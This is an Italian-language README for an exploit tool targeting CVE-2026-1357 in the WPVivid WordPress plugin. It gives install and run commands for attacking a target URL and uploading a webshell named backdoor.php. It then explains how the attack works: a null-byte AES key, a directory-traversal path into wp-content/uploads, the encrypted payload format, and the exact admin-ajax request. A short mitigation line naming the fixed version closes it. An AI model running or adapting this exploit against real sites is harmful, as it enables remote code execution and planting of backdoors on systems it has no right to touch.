
Exploit per CVE-2026-1357 nel plugin WPVivid di WordPress, che consente l'esecuzione remota di codice tramite payload crittografati AES appositamente predisposti e directory traversal per caricare una webshell.
pip3 install pycryptodome requests
python3 wpvivi.py http://target.com
python3 wpvivi.py http://target.com --shell backdoor.php
python3 wpvivi.py http://target.com --code "" Spiegazione tecnica: Null Byte Key: Quando la decrittazione RSA fallisce, restituisce false, che phpseclib tratta come "\x00\x00\x00". Usiamo 16 null byte come chiave AES-128 ECB. Directory Traversal: Il nome del file non viene sanitizzato, consentendo ../../../../wp-content/uploads/shell.php Formato del payload:
[len_key_hex(2 byte)] + [key_hex] + [len_data_hex(16 byte)] + [encrypted_data] Esecuzione: POST verso /wp-admin/admin-ajax.php?action=wpvivid_action&wpvivid_action=send_to_site wpvivid_content = base64(payload criptato) Rilevamento e Mitigazione:
Corretto nella versione 0.9.124:
if ($key === false || empty($key)) return false;